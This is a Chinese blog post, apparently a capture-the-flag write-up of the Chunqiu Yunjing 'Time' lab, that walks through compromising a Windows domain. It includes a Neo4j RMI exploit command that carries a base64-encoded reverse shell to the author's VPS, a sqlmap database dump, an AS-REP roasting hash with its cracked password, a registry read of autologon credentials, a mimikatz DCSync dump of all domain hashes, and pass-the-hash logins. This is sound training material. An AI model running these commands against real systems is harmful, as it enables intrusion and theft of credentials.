<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="flag1fscan扫一下.&#x2F;fscan.exe -h 39.99.225.0 -p 1-65535 扫出来有个Neo4j Browser，存在nday(https:&#x2F;&#x2F;github.com&#x2F;zwjjustdoit&#x2F;CVE-2021-34371.jar)，弹个shell到自己vps上，用户目录直接拿flag 1java -jar .\rhino_gadget.jar rmi:&#x2F;&#x2F;39.99.128">
<meta property="og:type" content="article">
<meta property="og:title" content="春秋云镜Time">
<meta property="og:url" content="https://rufeii.github.io/2026/01/07/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9CTime/index.html">
<meta property="og:site_name" content="Rufeii">
<meta property="og:description" content="flag1fscan扫一下.&#x2F;fscan.exe -h 39.99.225.0 -p 1-65535 扫出来有个Neo4j Browser，存在nday(https:&#x2F;&#x2F;github.com&#x2F;zwjjustdoit&#x2F;CVE-2021-34371.jar)，弹个shell到自己vps上，用户目录直接拿flag 1java -jar .\rhino_gadget.jar rmi:&#x2F;&#x2F;39.99.128">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://rufeii.github.io/images/achieve/2026/1/image-20260107205245814.png">
<meta property="og:image" content="https://rufeii.github.io/images/achieve/2026/1/image-20260107210729433.png">
<meta property="og:image" content="https://rufeii.github.io/images/achieve/2026/1/image-20260107212159501.png">
<meta property="og:image" content="https://fushuling-1309926051.cos.ap-shanghai.myqcloud.com/2023/08/7-1-1024x278.png">
<meta property="og:image" content="https://rufeii.github.io/images/achieve/2026/1/image-20260107233812932.png">
<meta property="og:image" content="https://rufeii.github.io/images/achieve/2026/1/image-20260107231729501.png">
<meta property="og:image" content="https://rufeii.github.io/images/achieve/2026/1/image-20260107232346779.png">
<meta property="article:published_time" content="2026-01-07T12:34:30.000Z">
<meta property="article:modified_time" content="2026-01-08T09:46:42.473Z">
<meta property="article:author" content="Rufeii">
<meta property="article:tag" content="pass the hash">
<meta property="article:tag" content="SID滥用">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://rufeii.github.io/images/achieve/2026/1/image-20260107205245814.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/website.jpg">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/website.jpg" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/website.jpg">
        
      
    
    <!-- title -->
    <title>春秋云镜Time</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">h0me</a></li><!--
     --><!--
       --><li><a href="/about/">ab0ut</a></li><!--
     --><!--
       --><li><a href="/categories/">categ0ries</a></li><!--
     --><!--
       --><li><a href="/tags/">tags</a></li><!--
     --><!--
       --><li><a href="/links/">links</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="Next post" href="/2026/01/04/something-about-XSS-Challenges/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://rufeii.github.io/2026/01/07/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9CTime/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://rufeii.github.io/2026/01/07/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9CTime/&text=春秋云镜Time"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://rufeii.github.io/2026/01/07/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9CTime/&title=春秋云镜Time"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://rufeii.github.io/2026/01/07/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9CTime/&is_video=false&description=春秋云镜Time"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=春秋云镜Time&body=Check out this article: https://rufeii.github.io/2026/01/07/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9CTime/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://rufeii.github.io/2026/01/07/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9CTime/&title=春秋云镜Time"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://rufeii.github.io/2026/01/07/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9CTime/&title=春秋云镜Time"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://rufeii.github.io/2026/01/07/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9CTime/&title=春秋云镜Time"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://rufeii.github.io/2026/01/07/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9CTime/&title=春秋云镜Time"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://rufeii.github.io/2026/01/07/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9CTime/&name=春秋云镜Time&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://rufeii.github.io/2026/01/07/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9CTime/&t=春秋云镜Time"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#flag1"><span class="toc-number">1.</span> <span class="toc-text">flag1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag2"><span class="toc-number">2.</span> <span class="toc-text">flag2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag3-flag4"><span class="toc-number">3.</span> <span class="toc-text">flag3&amp;flag4</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        春秋云镜Time
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Rufeii</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2026-01-07T12:34:30.000Z" class="dt-published" itemprop="datePublished">2026-01-07</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/SID%E6%BB%A5%E7%94%A8/" rel="tag">SID滥用</a>, <a class="p-category" href="/tags/pass-the-hash/" rel="tag">pass the hash</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="flag1"><a href="#flag1" class="headerlink" title="flag1"></a>flag1</h2><p>fscan扫一下<code>./fscan.exe -h 39.99.225.0 -p 1-65535</code></p>
<p>扫出来有个Neo4j Browser，存在nday(<a target="_blank" rel="noopener" href="https://github.com/zwjjustdoit/CVE-2021-34371.jar)%EF%BC%8C%E5%BC%B9%E4%B8%AAshell%E5%88%B0%E8%87%AA%E5%B7%B1vps%E4%B8%8A%EF%BC%8C%E7%94%A8%E6%88%B7%E7%9B%AE%E5%BD%95%E7%9B%B4%E6%8E%A5%E6%8B%BFflag">https://github.com/zwjjustdoit/CVE-2021-34371.jar)，弹个shell到自己vps上，用户目录直接拿flag</a></p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -jar .<span class="keyword">\rhino</span><span class="built_in">_</span>gadget.jar rmi://39.99.128.12:1337 &quot;bash -c &#123;echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzUueHgueHgueHgvOTk5OSAwPiYx&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;&quot; </span><br></pre></td></tr></table></figure>

<p><img src="/../images/achieve/2026/1/image-20260107205245814.png" alt="image-20260107205245814"></p>
<h2 id="flag2"><a href="#flag2" class="headerlink" title="flag2"></a>flag2</h2><p>从vps上下载相关工具开始打内网</p>
<p>扫一下内网</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">172.22.6.25:135 open</span><br><span class="line">172.22.6.12:139 open</span><br><span class="line">172.22.6.12:135 open</span><br><span class="line">172.22.6.38:80 open</span><br><span class="line">172.22.6.38:22 open</span><br><span class="line">172.22.6.36:22 open</span><br><span class="line">172.22.6.12:88 open</span><br><span class="line">172.22.6.25:445 open</span><br><span class="line">172.22.6.12:445 open</span><br><span class="line">172.22.6.25:139 open</span><br><span class="line">172.22.6.36:7687 open</span><br><span class="line">[*] alive ports len is: 11</span><br><span class="line">start vulscan</span><br><span class="line">[*] NetInfo </span><br><span class="line">[*]172.22.6.25</span><br><span class="line">   [-&gt;]WIN2019</span><br><span class="line">   [-&gt;]172.22.6.25</span><br><span class="line">[*] NetInfo </span><br><span class="line">[*]172.22.6.12</span><br><span class="line">   [-&gt;]DC-PROGAME</span><br><span class="line">   [-&gt;]172.22.6.12</span><br><span class="line">[*] NetBios 172.22.6.25     XIAORANG<span class="keyword">\WIN</span>2019              </span><br><span class="line">[*] OsInfo 172.22.6.12	(Windows Server 2016 Datacenter 14393)</span><br><span class="line">[*] NetBios 172.22.6.12     [+] DC:DC-PROGAME.xiaorang.lab       Windows Server 2016 Datacenter 14393</span><br><span class="line">[*] WebTitle http://172.22.6.38        code:200 len:1531   title:后台登录</span><br><span class="line">[*] WebTitle https://172.22.6.36:7687  code:400 len:50     title:None</span><br></pre></td></tr></table></figure>

<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">172.22.6.38 web机器，可以后台登录？</span><br><span class="line">172.22.6.36 已经被控</span><br><span class="line">172.22.6.25 XIAORANG<span class="keyword">\WIN</span>2019</span><br><span class="line">172.22.6.12 DC-PROGAME.xiaorang.lab</span><br></pre></td></tr></table></figure>

<p>搭建个隧道看看38，认真的？万能密码直接就登录成功，那么sqlmap一把梭哈</p>
<p>burpsuite本身就可以建立socks5代理</p>
<p><img src="/../images/achieve/2026/1/image-20260107210729433.png" alt="image-20260107210729433"></p>
<p>然后sqlmap一把梭(注意一下是socks5协议)</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -r &quot;sql.txt&quot; --proxy &quot;socks5://ip:port&quot; --dump</span><br></pre></td></tr></table></figure>

<p><img src="/../images/achieve/2026/1/image-20260107212159501.png" alt="image-20260107212159501"></p>
<p>得到flag2和一堆用户</p>
<h2 id="flag3-flag4"><a href="#flag3-flag4" class="headerlink" title="flag3&amp;flag4"></a>flag3&amp;flag4</h2><p>写个脚本把用户名提取出来保存为user.txt</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line"><span class="comment"># 打开原始数据文件</span></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;1.txt&#x27;</span>, <span class="string">&#x27;r&#x27;</span>) <span class="keyword">as</span> file:</span><br><span class="line">    data = file.readlines()</span><br><span class="line"></span><br><span class="line"><span class="comment"># 提取指定字符串</span></span><br><span class="line">users = []</span><br><span class="line"><span class="keyword">for</span> line <span class="keyword">in</span> data:</span><br><span class="line">    <span class="keyword">match</span> = re.search(<span class="string">r&#x27;(\w+)@xiaorang.lab&#x27;</span>, line)</span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">match</span>:</span><br><span class="line">        username = <span class="keyword">match</span>.group(<span class="number">1</span>)</span><br><span class="line">        users.append(username)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 保存提取后的字符串到 user.txt</span></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;user.txt&#x27;</span>, <span class="string">&#x27;w&#x27;</span>) <span class="keyword">as</span> file:</span><br><span class="line">    <span class="keyword">for</span> user <span class="keyword">in</span> users:</span><br><span class="line">        file.write(user + <span class="string">&#x27;\n&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>利用获取到的用户进行ASREPRoast攻击</p>
<blockquote>
<p>ASREPRoast攻击是一种离线爆破用户账号的攻击方式，它利用了Kerberos预身份验证的局限性。攻击者需要用户账号设置“不要求Kerberos预身份验证”选项，而该选项默认是没有勾选的。当攻击者勾选了该选项后，域控不会进行任何验证，直接返回用户Hash加密的Session Key。攻击者可以使用这些Session Key进行离线破解，如果字典足够强大，就能破解得到该指定用户的明文密码。</p>
<p>使用指定用户向域控制器的Kerberos 88端口请求票据，此时域控不会进行任何验证就将TGT和该用户Hash加密的Login Session Key 返回。进行离线破解，得到账户密码</p>
</blockquote>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">AS-REP</span><br><span class="line"></span><br><span class="line">KDC接受到请求后，会先通过AD活动目录查询该用户的密码Hash，然后AS会使用Client<span class="built_in">_</span>hash对请求包中的</span><br><span class="line"></span><br><span class="line">Authenticator进行解密，解密成功且时间戳范围在五分钟内则返回用krbtgt用户(它是 Windows 域的内置服务账</span><br><span class="line"></span><br><span class="line">户，密码由系统随机生成且无法手动登录，唯一作用是加密 TGT)hash加密的TGT票据，TGT里面包含PAC (特权属性证</span><br><span class="line"></span><br><span class="line">书)  ，PAC包含Client的sid、Client所在的组。除此之外AS会生成一个临时秘钥Login session key，并使用用</span><br><span class="line"></span><br><span class="line">户(之前发请求那个用户)NTLM-Hash加密Login session key作为响应包的一部分内容</span><br></pre></td></tr></table></figure>

<p>简单来说问题发生在Kerberos认证的AS-REP阶段，正常它是会对AS-REQ请求进行验证，但是这里没有验证造成了安全漏洞</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains4 impacket-GetNPUsers -dc-ip 172.22.6.12 -usersfile user.txt xiaorang.lab/</span><br></pre></td></tr></table></figure>

<p>拿到</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">$</span>krb5asrep<span class="built_in">$</span>23<span class="built_in">$</span>zhangxin@XIAORANG.LAB:8daf09967e221dc17252826aa139c286<span class="built_in">$</span>656611f099399fde29fa03f432c21f06184ffdd14850e4707a694267aac71b7eaaa09f79540bb2e4fcbfb2647c4b7a8391116df720373e9229c730f2157b8b8df6509a456c2af34ad0529d11331b1b5ef60626764302353ae458249c1c8e75692f9bd1ea909b8bd95c3b028757d1c3262de05678284e09c449d0fc4e51ffe96c5c9409da44ad49e025494b10551b6de744d38741a40dc3980a357cfd1c6010672fa7b653e64932b51bc93ccb0552c2eddd1b0d13ea842c52dacaddafab9ec64b15eb36b9fa907418493005c014a40db6a3e96c4b1cbfb4c2a627eb4a575089b0426af9a70895290ec0fdd476</span><br></pre></td></tr></table></figure>

<p>利用hashcat进行破解</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">hashcat -a 0 -m 18200 --force hash.txt rockyou.txt</span><br><span class="line"></span><br><span class="line">hashcat -a 0 -m 18200 --force hash.txt rockyou.txt --show</span><br><span class="line">拿到密码：strawberry</span><br><span class="line">账号就是：zhangxin@XIAORANG.LAB</span><br></pre></td></tr></table></figure>

<p>rdp试一下172.22.6.25成功了，但是没权限啊，太低了权限</p>
<p><code>query user</code>看看还有谁登录</p>
<p><img src="https://fushuling-1309926051.cos.ap-shanghai.myqcloud.com/2023/08/7-1-1024x278.png" alt="img"></p>
<p>发现yuxuan，用户与计算机时进行会话时，凭据会保留在内存中，说明yuxuan这个用户登录过WIN2019，很多用户习惯将计算机设置自动登录，这样就可以查询注册表来获取自动登录的用户名和密码了。</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reg query &quot;HKEY<span class="built_in">_</span>LOCAL<span class="built_in">_</span>MACHINE<span class="keyword">\SOFTWARE</span><span class="keyword">\Microsoft</span><span class="keyword">\Windows</span> NT<span class="keyword">\CurrentVersion</span><span class="keyword">\Winlogon</span>&quot;</span><br></pre></td></tr></table></figure>

<p><img src="/../images/achieve/2026/1/image-20260107233812932.png" alt="image-20260107233812932"></p>
<p>使用这个用户重新去登录一下，然后使用工具SharpHound进行数据采集</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SharpHound.exe -c all</span><br></pre></td></tr></table></figure>

<p>我之前采集的是zhangxin，后面搞烦了，看wp打好多都不明所以然，自己盲打就困难。直接拿师傅们的图</p>
<p><img src="/../images/achieve/2026/1/image-20260107231729501.png" alt="image-20260107231729501"></p>
<p>发现这个用户滥用了SID历史功能</p>
<blockquote>
<p>SIDHistory是一个为支持域迁移方案而设置的属性，当一个对象从一个域迁移到另一个域时，会在新域创建一个新的SID作为该对象的objectSid，在之前域中的SID会添加到该对象的SIDHistory属性中，此时该对象将保留在原来域的SID对应的访问权限</p>
</blockquote>
<p>也就是说该用户在域迁移后，仍拥有前域的权限。那么去dump hash</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz.exe &quot;lsadump::dcsync /domain:xiaorang.lab /all /csv&quot; &quot;exit&quot;</span><br></pre></td></tr></table></figure>

<p><img src="/../images/achieve/2026/1/image-20260107232346779.png" alt="image-20260107232346779"></p>
<p>直接把域管理员哈希dump了，所以相当于已经拿下域控了,接下来就是PTH</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">proxychains4 impacket-wmiexec  XIAORANG/administrator@172.22.6.25   -hashes :04d93ffd6f5f6e4490e0de23f240a5e9</span><br><span class="line"></span><br><span class="line">proxychains4 impacket-wmiexec  XIAORANG/administrator@172.22.6.12   -hashes :04d93ffd6f5f6e4490e0de23f240a5e9</span><br></pre></td></tr></table></figure>

<p>这里不知道是我开着梯子还是什么鬼原因，导致一开始一直time out后面把梯子关了，重启了一下kali就好了</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">分别拿flag</span><br><span class="line">type  C:<span class="keyword">\Users</span><span class="keyword">\Adminstrator</span><span class="keyword">\flag</span><span class="keyword">\flag</span>03.txt</span><br><span class="line">type  C:<span class="keyword">\Users</span><span class="keyword">\Adminstrator</span><span class="keyword">\flag</span><span class="keyword">\flag</span>04.txt</span><br></pre></td></tr></table></figure>




  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">h0me</a></li>
        
          <li><a href="/about/">ab0ut</a></li>
        
          <li><a href="/categories/">categ0ries</a></li>
        
          <li><a href="/tags/">tags</a></li>
        
          <li><a href="/links/">links</a></li>
        
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#flag1"><span class="toc-number">1.</span> <span class="toc-text">flag1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag2"><span class="toc-number">2.</span> <span class="toc-text">flag2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag3-flag4"><span class="toc-number">3.</span> <span class="toc-text">flag3&amp;flag4</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://rufeii.github.io/2026/01/07/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9CTime/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://rufeii.github.io/2026/01/07/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9CTime/&text=春秋云镜Time"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://rufeii.github.io/2026/01/07/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9CTime/&title=春秋云镜Time"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://rufeii.github.io/2026/01/07/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9CTime/&is_video=false&description=春秋云镜Time"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=春秋云镜Time&body=Check out this article: https://rufeii.github.io/2026/01/07/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9CTime/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://rufeii.github.io/2026/01/07/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9CTime/&title=春秋云镜Time"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://rufeii.github.io/2026/01/07/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9CTime/&title=春秋云镜Time"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://rufeii.github.io/2026/01/07/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9CTime/&title=春秋云镜Time"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://rufeii.github.io/2026/01/07/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9CTime/&title=春秋云镜Time"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://rufeii.github.io/2026/01/07/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9CTime/&name=春秋云镜Time&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://rufeii.github.io/2026/01/07/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9CTime/&t=春秋云镜Time"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2025-2026
    Rufeii
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <li><a href="/">h0me</a></li><li><a href="/about/">ab0ut</a></li><li><a href="/categories/">categ0ries</a></li><li><a href="/tags/">tags</a></li><li><a href="/links/">links</a></li><li><a href="/search/">Search</a></li>
      </ul>
      <ul>
            
              <span id="busuanzi_container_site_pv">
                  本站总访问量<span id="busuanzi_value_site_pv"></span>次
              </span>
              <span class="post-meta-divider">|</span>
              <span id="busuanzi_container_site_uv" style='display:none'>
                      本站访客数<span id="busuanzi_value_site_uv"></span>人
              </span>
              
            
      </ul>
    </nav>
  </div>
</footer>
    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->


<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
</body>
</html>
